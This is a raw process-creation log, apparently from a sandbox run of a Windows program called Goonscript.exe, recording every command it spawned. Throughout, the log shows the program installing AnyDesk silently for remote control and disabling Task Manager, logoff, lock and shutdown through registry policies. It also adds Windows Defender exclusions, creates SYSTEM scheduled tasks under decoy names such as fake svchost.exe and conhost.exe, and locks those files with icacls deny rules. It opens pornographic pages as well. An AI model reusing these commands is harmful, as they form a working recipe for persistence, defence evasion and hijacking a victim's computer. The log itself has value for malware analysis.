"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5424 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\2C5A.tmp\2C5B.tmp\2C5C.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30BF.tmp\30C0.tmp\30C1.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\367C.tmp\367D.tmp\367E.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3AA3.tmp\3AA4.tmp\3AA5.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --control
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3e0 0x2f4
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71A1.tmp\71A2.tmp\71A3.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8085.tmp\8086.tmp\8087.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8600 /prefetch:1
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData/Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData/stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE1B.tmp\BE1C.tmp\BE1D.bat C:\ProgramData\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
